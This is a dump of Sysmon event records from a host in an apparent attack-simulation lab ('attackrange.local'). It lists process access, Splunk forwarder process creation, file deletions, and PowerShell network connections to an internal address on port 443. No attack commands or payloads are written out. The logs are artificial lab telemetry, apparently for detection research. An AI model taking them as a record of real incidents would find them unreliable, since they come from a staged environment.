Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:38.511{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A25A-6140-B856-04000000C801}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A25A-6140-B856-04000000C801}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.511{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A25A-6140-B856-04000000C801}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.496{B81B27B7-A25A-6140-B856-04000000C801}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:07.805{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50686-false10.0.1.12-8000- 23542300x800000000000000036498780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.894{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1FD7BF513988558EAF0B7368506395C,SHA256=DA65A8F8F2A1DFA8860F40E82740EADE2C8E5CB6842EC923CCE1B912265ECB08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.194{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A25B-6140-B956-04000000C801}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:39.194{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
EventID=10 RecordID=(see preceding line) UtcTime=2021-09-14 13:23:39.194 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Common to every record below: Channel=Microsoft-Windows-Sysmon/Operational Computer=win-host-987.attackrange.local Level=4 Opcode=0 Keywords=0x8000000000000000 RuleName=- (Version/Task: EventID 1 = 5/1, EventID 3 = 5/3, EventID 10 = 3/10, EventID 23 = 5/23). Records are listed in the dump's original order.
EventID=10 RecordID=36498776 UtcTime=2021-09-14 13:23:39.194 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498775 UtcTime=2021-09-14 13:23:39.194 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498774 UtcTime=2021-09-14 13:23:39.194 SourceProcessGUID={B81B27B7-4012-611D-0500-00000000C801} SourceProcessId=420 SourceThreadId=984 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={B81B27B7-A25B-6140-B956-04000000C801} TargetProcessId=7052 TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventID=10 RecordID=36498773 UtcTime=2021-09-14 13:23:39.194 SourceProcessGUID={B81B27B7-4013-611D-2700-00000000C801} SourceProcessId=2076 SourceThreadId=3760 SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe TargetProcessGUID={B81B27B7-A25B-6140-B956-04000000C801} TargetProcessId=7052 TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=1 RecordID=36498772 UtcTime=2021-09-14 13:23:39.180 ProcessGuid={B81B27B7-A25B-6140-B956-04000000C801} ProcessId=7052 Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe FileVersion=8.0.2 Description=Windows Print Monitor Product=splunk Application Company=Splunk Inc. OriginalFileName=splunk-winprintmon.exe CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe" CurrentDirectory=C:\Windows\system32\ User=NT AUTHORITY\SYSTEM LogonGuid={B81B27B7-4012-611D-E703-000000000000} LogonId=0x3e7 TerminalSessionId=0 IntegrityLevel=System Hashes=MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748 ParentProcessGuid={B81B27B7-4013-611D-2700-00000000C801} ParentProcessId=2076 ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
EventID=23 RecordID=36498783 UtcTime=2021-09-14 13:23:40.908 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=C1AE8036E089EAECC1D6726FCCF9454A,SHA256=43AD5F94CCE435063E867E7257FFB4E165374FE6033DBFFBC03E834BFE62A844,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498782 UtcTime=2021-09-14 13:23:40.593 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational Hashes=MD5=93D140E589E975F9839B2532EA1B0077,SHA256=3CF946737298D91F5AED6D592122B46EF96B5E2B8434A8FCBF0B879D1FADCF2C,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498781 UtcTime=2021-09-14 13:23:40.278 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security Hashes=MD5=66F27AB358D14158904424E15ACBA716,SHA256=30682067DC2A33550E52BB9D177B8CB2776612DCC7999E031AFA2F669FCCC102,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498785 UtcTime=2021-09-14 13:23:41.939 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=E7BD5D940A64A52B54F18AFE6BBD8DBD,SHA256=643FFCFF1C94AC0993E7AE421A6A650DC07D23AC676BEB7DB89BA17EFFD3505E,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=3 RecordID=36498784 UtcTime=2021-09-14 13:24:11.249 ProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ProcessId=6940 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User=ATTACKRANGE\REED_SCHMIDT Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.15 SourceHostname=win-host-987.attackrange.local SourcePort=50687 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.16 DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal DestinationPort=443 DestinationPortName=https
EventID=23 RecordID=36498786 UtcTime=2021-09-14 13:23:42.957 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=12050A6CB1F36A4BB8CB9A752B170C55,SHA256=CD1D9B1F52CA1E628B60B84C03FFD186665B23F9D3D83CF36BB3CB398225EA10,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498787 UtcTime=2021-09-14 13:23:43.989 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=1C75F00E24F2B210B2CB0C6D8B1BDAFD,SHA256=89173B6E78A2EF432357C1FB6BC6DDDE5FA38107897EF00B0EFEC47ECC25A910,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498789 UtcTime=2021-09-14 13:23:44.705 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational Hashes=MD5=4536B308CF060E43BD7B64C8C131E3DC,SHA256=BC6F1E6365A0073C50D5D43D6B8D2E29317416C7097E6C33254422AC3E82C92A,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=3 RecordID=36498788 UtcTime=2021-09-14 13:24:13.799 ProcessGuid={B81B27B7-401D-611D-6900-00000000C801} ProcessId=3616 Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe User=NT AUTHORITY\SYSTEM Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.15 SourceHostname=win-host-987.attackrange.local SourcePort=50688 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.12 DestinationHostname=- DestinationPort=8000 DestinationPortName=-
EventID=3 RecordID=36498791 UtcTime=2021-09-14 13:24:15.267 ProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ProcessId=6940 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User=ATTACKRANGE\REED_SCHMIDT Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.15 SourceHostname=win-host-987.attackrange.local SourcePort=50689 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.16 DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal DestinationPort=443 DestinationPortName=https
EventID=23 RecordID=36498790 UtcTime=2021-09-14 13:23:45.020 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=C023A7A0BEBFAD3CD7E9FB4A6A4459B1,SHA256=1B9F43270402AD48037D9BFCC87EF13687F0DBBA279E98B142FB942D542DD331,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498792 UtcTime=2021-09-14 13:23:46.052 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=219075C0F313812BEB024E2E6F50A4C6,SHA256=7FDFB92421EA3E0CF6900764B6D077EE7FD4EB48115EDF1236534D84000F28FA,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498793 UtcTime=2021-09-14 13:23:47.071 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=2DD96BD0CE3BDD79BB925551C46D497C,SHA256=A9A41889955AF041D9FB48FD8449B38C6278DD66C35BA45C5CB18B2D2D8881F0,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498794 UtcTime=2021-09-14 13:23:48.102 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=1332391F81C8F5220A019D2571622580,SHA256=2F4D3EBB51D0627BFC47B1576B0600002D8E5A1E1415DD28D7FAA4E2717953BD,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498795 UtcTime=2021-09-14 13:23:49.132 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=3255F7E775859A38DE19D830F205F5B3,SHA256=7F17F30034F147A02DB431B6217CE3A39B2DC7E2078B4CBDDF1B1D02E6CACB6B,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498798 UtcTime=2021-09-14 13:23:50.615 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational Hashes=MD5=B0EAAC8DB813EDAE7ADDBCF40B81FF5A,SHA256=ADC4F619233C3D8BA6E3F447FEE364BBA2F143F01D11431A14EAFECEB5823B26,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
